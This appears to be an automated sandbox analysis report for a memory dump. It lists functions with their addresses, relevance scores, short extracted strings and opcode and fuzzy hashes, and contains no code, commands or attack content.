                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: 0c"q$8c"q
                              • API String ID: 0-3321867916
                              • Opcode ID: 97a6271093324cb421781dfc5dce7be9553b0a453038d5500d3b0551e948bde9
                              • Instruction ID: 823d2b3de6c5d9091f3bed044542628245de508b8b314f3df7ef04b75b17fb0b
                              • Opcode Fuzzy Hash: 97a6271093324cb421781dfc5dce7be9553b0a453038d5500d3b0551e948bde9
                              • Instruction Fuzzy Hash: 9F016120A1DB4D2FE328A6794C2F5FA3AC5DF96610F0501BEE445C31D3EC996C078282
                              Function 00007FFD9BAD3E80 Relevance: 2.6, Strings: 2, Instructions: 51COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: 8\"q$6"q
                              • API String ID: 0-2546099626
                              • Opcode ID: c3fd509ca93545ca28513dd70d52af553151264bb3ece3b8dbd7cc98f991bcce
                              • Instruction ID: 6cb3bafc082e0ff3968808fd530f62a25a622b5a7147925e2282fe7937cb54bd
                              • Opcode Fuzzy Hash: c3fd509ca93545ca28513dd70d52af553151264bb3ece3b8dbd7cc98f991bcce
                              • Instruction Fuzzy Hash: 6901A720B1EA5E1FE375A6B854661B97AD0DF45224F0649BEE809C71D2EC8948828345
                              Function 00007FFD9BB16340 Relevance: 1.9, Strings: 1, Instructions: 669COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: x6"q
                              • API String ID: 0-798607815
                              • Opcode ID: 9f05d08cfb0e5458764481256515f3ea930da0b62c1744a250b3cb8520f3d983
                              • Instruction ID: b9e54e33a0aee3f970e69cd2889c885e296ec61d6964e2790f0483573ca4ed1c
                              • Opcode Fuzzy Hash: 9f05d08cfb0e5458764481256515f3ea930da0b62c1744a250b3cb8520f3d983
                              • Instruction Fuzzy Hash: F712472071D9494FEB6C9E1CE865AA933D1FF59304F1501BEE44ECB2E7CE24ED428685
                              Function 00007FFD9BAE09EB Relevance: 1.9, Strings: 1, Instructions: 611COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: 4K_H
                              • API String ID: 0-1743149810
                              • Opcode ID: 33b8aff2d8b0c419cb16b14029e944b4e0abfc205a159646c7b15f4d23b54f31
                              • Instruction ID: 7d4f7c51ec4aeebe7d91d4214d44bef998c8212d1a92ce37d861bb69b3492350
                              • Opcode Fuzzy Hash: 33b8aff2d8b0c419cb16b14029e944b4e0abfc205a159646c7b15f4d23b54f31
                              • Instruction Fuzzy Hash: 19227430719A4E8FDBA8EF58C4A5AA973E2FF98304F514569E41DC7296CB35EC42CB40
                              Function 00007FFD9BB0AD70 Relevance: 1.7, Strings: 1, Instructions: 444COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: d
                              • API String ID: 0-2564639436
                              • Opcode ID: 201ed91e8c6b4b2b21dbe9d6d88e9c1180d6bdc0c1cfe57dc1c034dc81035791
                              • Instruction ID: 8c23b5d4d6d1bb7c89664b1a083e3d2d7100380b0333ec92c33c5a6fb9e7100c
                              • Opcode Fuzzy Hash: 201ed91e8c6b4b2b21dbe9d6d88e9c1180d6bdc0c1cfe57dc1c034dc81035791
                              • Instruction Fuzzy Hash: 5BD19230618B098FD768DF18D4A5AB5B3E1FF94314F10497DD09EC76A6DA35B882CB81
                              Function 00007FFD9BADBC0D Relevance: 1.7, Strings: 1, Instructions: 438COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: H
                              • API String ID: 0-2852464175
                              • Opcode ID: c0acbb0525caba1999288867097a52313887e472d93e8bb7fcd7777089990d71
                              • Instruction ID: 364d76bf696508bc75c79fd5624c3a7ce8c57c6be5acab41a998ff4d18cb5444
                              • Opcode Fuzzy Hash: c0acbb0525caba1999288867097a52313887e472d93e8bb7fcd7777089990d71
                              • Instruction Fuzzy Hash: E7F18531618A4E8FDF88EF58C894AEA73B1FF94304F544679E41AC72D6DE35A942CB40
                              Function 00007FFD9BAD3EF9 Relevance: 1.6, Strings: 1, Instructions: 376COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: 6"q
                              • API String ID: 0-2332663774
                              • Opcode ID: c5d994d64920875f43912c111faa3c56fd7e30d9f6508692421295b71ebe3ee9
                              • Instruction ID: fde61fd042626ac3279405de8375033f68a4c6a53e7210cb4183f0394c567b8c
                              • Opcode Fuzzy Hash: c5d994d64920875f43912c111faa3c56fd7e30d9f6508692421295b71ebe3ee9
                              • Instruction Fuzzy Hash: BEC13731B0D68E4FEBA4DB6888652B97BE1FF99310F05067ED05DC71E2CE689906C741
                              Function 00007FFD9BAD0E40 Relevance: 1.5, Strings: 1, Instructions: 286COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: Pc"q
                              • API String ID: 0-543728205
                              • Opcode ID: fe41e7ada841699d77081133ac063f1a5217245e4acb0745958b3f2a69a34b0a
                              • Instruction ID: 2213093197b556f18274e8af8b6233026a1d56570c26961878c08d5c30876289
                              • Opcode Fuzzy Hash: fe41e7ada841699d77081133ac063f1a5217245e4acb0745958b3f2a69a34b0a
                              • Instruction Fuzzy Hash: C981D332A0CA4D4FD7A8DBACD455AB9B7E1EFD8311F05437ED04EC32A5DE64A8028781
                              Function 00007FFD9BAE3BCD Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: `"q
                              • API String ID: 0-1225899144
                              • Opcode ID: 5cf2d26bc8c2512e09c38a9a05a7f1c6b4ccd21dfa8d7c71c445347589a38f77
                              • Instruction ID: 266b58a8ac55f73f48eb40ac18466f1683f37bf0b10892a217449cc7770576d1
                              • Opcode Fuzzy Hash: 5cf2d26bc8c2512e09c38a9a05a7f1c6b4ccd21dfa8d7c71c445347589a38f77
                              • Instruction Fuzzy Hash: E1810632A0E6CD1FE76397B448655F97FE0EF46320F0A05FAD488CB0A3D95D5A1A8742
                              Function 00007FFD9BAE9D5D Relevance: 1.5, Strings: 1, Instructions: 267COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: a"q
                              • API String ID: 0-1221842623
                              • Opcode ID: 79b30cac2a1ddc73714c449c352272fe7fa88ffba3822f3f104975c6e11caa82
                              • Instruction ID: d747795d52f9a920b19cc15ffc05bc8d672c658cbb516e7b57e491ee66944bb4
                              • Opcode Fuzzy Hash: 79b30cac2a1ddc73714c449c352272fe7fa88ffba3822f3f104975c6e11caa82
                              • Instruction Fuzzy Hash: 96711A32A0E68D0FE731A7B958261ED7BA0DF45325F0902F7D45CCB0E3E968161A8792
                              Function 00007FFD9BAE1A5B Relevance: 1.5, Strings: 1, Instructions: 252COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: #K_H
                              • API String ID: 0-2854761940
                              • Opcode ID: e944f087459df2e9aecf5a8a0ab208fb8bddfeedba0f7f50a7f0cb55fe0fd42f
                              • Instruction ID: 511ea47eb9a36cb0e2b5fff61c7de7df6aea1d21f34f5ae9e1f080d84d11c417
                              • Opcode Fuzzy Hash: e944f087459df2e9aecf5a8a0ab208fb8bddfeedba0f7f50a7f0cb55fe0fd42f
                              • Instruction Fuzzy Hash: F181CC31708A4E8FDB94EF58C451AEA77E1FF59310B1446A9D419C729ACA75EC43CB80
                              Function 00007FFD9BAD835E Relevance: 1.5, Strings: 1, Instructions: 229COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: K_^
                              • API String ID: 0-847152731
                              • Opcode ID: d55f7c2014f8fa1460025450eba1e1221d1783b12cd0fc3c43817ca9b2739cd2
                              • Instruction ID: 5a941947c49c6b390c5a82163b09eea8f84e465c4dc61c4125c435c42b1a03a5
                              • Opcode Fuzzy Hash: d55f7c2014f8fa1460025450eba1e1221d1783b12cd0fc3c43817ca9b2739cd2
                              • Instruction Fuzzy Hash: BF611832A0E6DA0FE766577458251E57FA0DF83230F0A02FAD49DCB0E3D95D690A8352
                              Function 00007FFD9BAEC768 Relevance: 1.5, Strings: 1, Instructions: 203COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: x6"q
                              • API String ID: 0-798607815
                              • Opcode ID: 651b61218ab4d80a867ab8a2ed550f90466277ec43e7575507ef8b5a237dd070
                              • Instruction ID: a012373a2beba69a0eb988541cfe6a6df70cbdf865161954f057a02622a45954
                              • Opcode Fuzzy Hash: 651b61218ab4d80a867ab8a2ed550f90466277ec43e7575507ef8b5a237dd070
                              • Instruction Fuzzy Hash: FA512A3370EA894FD768E76C98655F937D1EF9536070502FBE049CB1A7ED18AD068380
                              Function 00007FFD9BAE5728 Relevance: 1.4, Strings: 1, Instructions: 179COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: X_H
                              • API String ID: 0-1769130057
                              • Opcode ID: 0e01afd26280ea26236ef6475dbffabb19dac4728954768b064220d245101ac2
                              • Instruction ID: 9644889a840915376836a1aab6a3aaebed2cccc8c97208e8daa910b0a5dafe69
                              • Opcode Fuzzy Hash: 0e01afd26280ea26236ef6475dbffabb19dac4728954768b064220d245101ac2
                              • Instruction Fuzzy Hash: 0141E671F0DE0D4FEBA8EF4994596BA73D1EFA8310F50017AD44DD72AAED74A8428780
                              Function 00007FFD9BAE80BC Relevance: 1.4, Strings: 1, Instructions: 178COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: x6"q
                              • API String ID: 0-798607815
                              • Opcode ID: d1e22f4841ebafd817729bf6b2b1ca17488b4fa3cdf1605888b3c2dd0d959a4f
                              • Instruction ID: b58f993b896b9b1f75b1baf5888c0ec726f987c762e5e3e3ff986d1837316a89
                              • Opcode Fuzzy Hash: d1e22f4841ebafd817729bf6b2b1ca17488b4fa3cdf1605888b3c2dd0d959a4f
                              • Instruction Fuzzy Hash: 62516920A0E7CA0FE3668BB494650B57FE1EF96320B0501FFD4C6CB1A7EA6D69468351
                              Function 00007FFD9BB21B20 Relevance: 1.4, Strings: 1, Instructions: 175COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: "G_I
                              • API String ID: 0-1820957507
                              • Opcode ID: f92d1352090fa1da71c72a2a989fd410d8ee1a0790aeca8f8e5ad9a17b84b217
                              • Instruction ID: 1f175bc170a15373f56858f07b08cf16c0b33c7a835c52c537a8b7fa5766363f
                              • Opcode Fuzzy Hash: f92d1352090fa1da71c72a2a989fd410d8ee1a0790aeca8f8e5ad9a17b84b217
                              • Instruction Fuzzy Hash: 63512465B0EA0D0BEFA8DA5D847567427C2FFA8348F0541B9D05DCB2E6DE69AD02C740
                              Function 00007FFD9BB14B30 Relevance: 1.4, Strings: 1, Instructions: 170COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: x6"q
                              • API String ID: 0-798607815
                              • Opcode ID: 2bfdbab3da1fd2f3a74fb0851798649c998f25497926b98b8b11edf25e3bb747
                              • Instruction ID: a863484f6cd6c3ccd646ce2476b37b6bf0fca86f54306bf4c6480ce4466baf4b
                              • Opcode Fuzzy Hash: 2bfdbab3da1fd2f3a74fb0851798649c998f25497926b98b8b11edf25e3bb747
                              • Instruction Fuzzy Hash: 9841353070EB4A4FE7699A6C9866A763BD1FF47314B1601BDD08AC71E7ED94EC028781
                              Function 00007FFD9BAE9719 Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: X_H
                              • API String ID: 0-1769130057
                              • Opcode ID: 8bf499dc48a71f12c78a4d696bffb07d14d168b750291daf7857facc188a416b
                              • Instruction ID: e2076d885089db7138e772d3a9b73b8e8ef783a99f6ebc1977c68f1af4b659d2
                              • Opcode Fuzzy Hash: 8bf499dc48a71f12c78a4d696bffb07d14d168b750291daf7857facc188a416b
                              • Instruction Fuzzy Hash: C4413631E0DF0D4FDBA8EB4898596B977E1EFA9310F0101BBD449D71A6EE34AC468781
                              Function 00007FFD9BAE4B39 Relevance: 1.4, Strings: 1, Instructions: 151COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: 8`"q
                              • API String ID: 0-3703358456
                              • Opcode ID: 0b2b95b92dcd60a3ee6cdd4ebb011cc257d7841b8cecb542b53ae37da4df89da
                              • Instruction ID: 75077600db430ffb4d9703c027aac529f09b02c6d89291266114f68d8c7186ca
                              • Opcode Fuzzy Hash: 0b2b95b92dcd60a3ee6cdd4ebb011cc257d7841b8cecb542b53ae37da4df89da
                              • Instruction Fuzzy Hash: 00412730709A4E8FDB99EFB88455AA977E1FF98311B1145BDD00AC72A2CE799C42C740
                              Function 00007FFD9BAD4068 Relevance: 1.4, Strings: 1, Instructions: 142COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: 6"q
                              • API String ID: 0-2332663774
                              • Opcode ID: 581d6becb31996f5d653100a659c9b0fc1fdb13ee4df8cb34e2321f2bdbf964c
                              • Instruction ID: e116416ba356cc29c6ec7fc910d5c6f34862d887960d0c1a60994561b3c0aac5
                              • Opcode Fuzzy Hash: 581d6becb31996f5d653100a659c9b0fc1fdb13ee4df8cb34e2321f2bdbf964c
                              • Instruction Fuzzy Hash: B141C331A0994E8FEB98DF58C4656BA77E1FFA8310F04463EE419D32A4DE789942CB40
                              Function 00007FFD9BAEA348 Relevance: 1.4, Strings: 1, Instructions: 124COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: x6"q
                              • API String ID: 0-798607815
                              • Opcode ID: cef699e8952a2ad7b3d0a0270b9cb852388616f557e6d1ddb81f62e2b6609578
                              • Instruction ID: 750baef3a7a0836e57457077df71e2d22666017ef472cc8f1467077c03843b8c
                              • Opcode Fuzzy Hash: cef699e8952a2ad7b3d0a0270b9cb852388616f557e6d1ddb81f62e2b6609578
                              • Instruction Fuzzy Hash: 0631F62171ED1E4FEBA8ED9C54A96B527C1FF6D399B01007AE44EC32E2DC15ED428340
                              Function 00007FFD9BAEAF35 Relevance: 1.4, Strings: 1, Instructions: 118COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: ;L
                              • API String ID: 0-2817095199
                              • Opcode ID: 3c57d0cc3ca088128ef4628b2a75d0062d738e87395d74467e503c014d9ab7e0
                              • Instruction ID: f9193d40a70c10a01f550fee83190077cacf2d97ba8c38c58909fd631c5a8750
                              • Opcode Fuzzy Hash: 3c57d0cc3ca088128ef4628b2a75d0062d738e87395d74467e503c014d9ab7e0
                              • Instruction Fuzzy Hash: CA31E47271C9490FDB5CAA1898569F933D0EFA9368F00427EF45F871C7DD25A8064281
                              Function 00007FFD9BAD2A7A Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: Pc"q
                              • API String ID: 0-543728205
                              • Opcode ID: 89ed0ce726cc50d47afe5514b23d2adc12bb4ae99c0b96beb592a279898fa8f0
                              • Instruction ID: fe793981677d677554862dbabdf6398bfdcc7deb01aa07bff30e30c54e6dc00f
                              • Opcode Fuzzy Hash: 89ed0ce726cc50d47afe5514b23d2adc12bb4ae99c0b96beb592a279898fa8f0
                              • Instruction Fuzzy Hash: AB214B3161E7CA4FD76697B8D8254A5BBD0EFC232170602FBD089CB073DE589942C342
                              Function 00007FFD9BADC0CB Relevance: 1.3, Strings: 1, Instructions: 74COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: H
                              • API String ID: 0-2852464175
                              • Opcode ID: a6465d290e1026b2c4f874567e3ae9c67c621f2edbbbbbb1a8cb84115d189757
                              • Instruction ID: 4380a80302237d2071ca12cef4d8e2598232c606b80d4224e14bf15de1129af1
                              • Opcode Fuzzy Hash: a6465d290e1026b2c4f874567e3ae9c67c621f2edbbbbbb1a8cb84115d189757
                              • Instruction Fuzzy Hash: EB213574604A4E8FDB88EF58C898AE973E1FF58304F544679D42DCB296DF75A842CB40
                              Function 00007FFD9BAE415E Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: H
                              • API String ID: 0-2852464175
                              • Opcode ID: 1f170c1951d0665696bda24afaf173787017b92ea1542eae114666e5afd2bab3
                              • Instruction ID: c5892db19e40c2cf239d52a9efd3add78b93ab146ec959bd93b20e2d264ecabb
                              • Opcode Fuzzy Hash: 1f170c1951d0665696bda24afaf173787017b92ea1542eae114666e5afd2bab3
                              • Instruction Fuzzy Hash: 07214530B09A4E4FEFD9EF588461BA973D2FF98344F1045A9D41DC719ADD38E8428741
                              Function 00007FFD9BAD6C19 Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: c"q
                              • API String ID: 0-1263993553
                              • Opcode ID: ed34e5976d5f4ad3f83b4ce6154693e0d54e620ed44268713ff392ca5df17ecb
                              • Instruction ID: 0cb288852be5fd4a306397ad0a5436c011b550df861d6ac6b42725206128777d
                              • Opcode Fuzzy Hash: ed34e5976d5f4ad3f83b4ce6154693e0d54e620ed44268713ff392ca5df17ecb
                              • Instruction Fuzzy Hash: 2A112C12B0E6964FEB7097FC587A2A53FD0DF96640B4642E6D488C7063EA5C2D15C352
                              Function 00007FFD9BAD6C27 Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: c"q
                              • API String ID: 0-1263993553
                              • Opcode ID: c3bdf19d2e29be6427f695adac8ecc9941d1dd4f76369bf3a5b129f7914b71f3
                              • Instruction ID: 6f4b685f97f7b761913c2aa8c058b7ed72a4ede79d5f2ff998c67dc830ec239e
                              • Opcode Fuzzy Hash: c3bdf19d2e29be6427f695adac8ecc9941d1dd4f76369bf3a5b129f7914b71f3
                              • Instruction Fuzzy Hash: A6112E12F0E64B4FEBB057FC24762E43BD0DF95A40F4641B6D888C71A3E9492D05C242
                              Function 00007FFD9BAD88FD Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: ["q
                              • API String ID: 0-1630516985
                              • Opcode ID: bda9688a6a5582ff4ac8ccfcc87956476d44bc0e43c1b4b33ad9591a9002c90e
                              • Instruction ID: 616ad6c57bd81853f53e5de7eaba7f2438eb53467b5d55ad27550691fc25826c
                              • Opcode Fuzzy Hash: bda9688a6a5582ff4ac8ccfcc87956476d44bc0e43c1b4b33ad9591a9002c90e
                              • Instruction Fuzzy Hash: 92016622A0E58E1FE7719BA858641FD3FD0FF91220B0502BBE458C30A3ED6426044201
                              Function 00007FFD9BAEC10C Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: `a"q
                              • API String ID: 0-3553070722
                              • Opcode ID: c69803cde22ddcd4d9e701901e02b30fbdc739caa06576d541799dcd84d2843c
                              • Instruction ID: 9ba7b41a155207140cdfae82d5a075190f7842f36076da1911522c1cb1efe9a8
                              • Opcode Fuzzy Hash: c69803cde22ddcd4d9e701901e02b30fbdc739caa06576d541799dcd84d2843c
                              • Instruction Fuzzy Hash: F1110436A0E7CC5FD722EB7498544E97FB0EF56300F0100EBE858CB1A3EA691A19C742
                              Function 00007FFD9BAE746B Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: `"q
                              • API String ID: 0-3812150748
                              • Opcode ID: a5604597e3171377aeab7d591c1428367822c7a31fdbd9c29b0182b9f28d4f62
                              • Instruction ID: ce5431977a703d5ee37f0805fabf60004348da3c935b09537b269f5dc875e086
                              • Opcode Fuzzy Hash: a5604597e3171377aeab7d591c1428367822c7a31fdbd9c29b0182b9f28d4f62
                              • Instruction Fuzzy Hash: 1C118E3190EBC95FD7139BB4583A5A57FB0AF53210B0A45EBD488CB0E3D9181E59C322
                              Function 00007FFD9BAEC139 Relevance: 1.3, Strings: 1, Instructions: 56COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: `a"q
                              • API String ID: 0-3553070722
                              • Opcode ID: cb806a22222cc33f84d954d07e65eea78c6ab3de61d3cf7696b545d162ca5a7d
                              • Instruction ID: 227910a2516bb364d1479576d7fce2fee01c139b8e74322112702e71f6a15e4f
                              • Opcode Fuzzy Hash: cb806a22222cc33f84d954d07e65eea78c6ab3de61d3cf7696b545d162ca5a7d
                              • Instruction Fuzzy Hash: 3801F13198E7CD2FD723D77458A94E53FA0EE56210B0600EBE898CB1A3E858165AC342
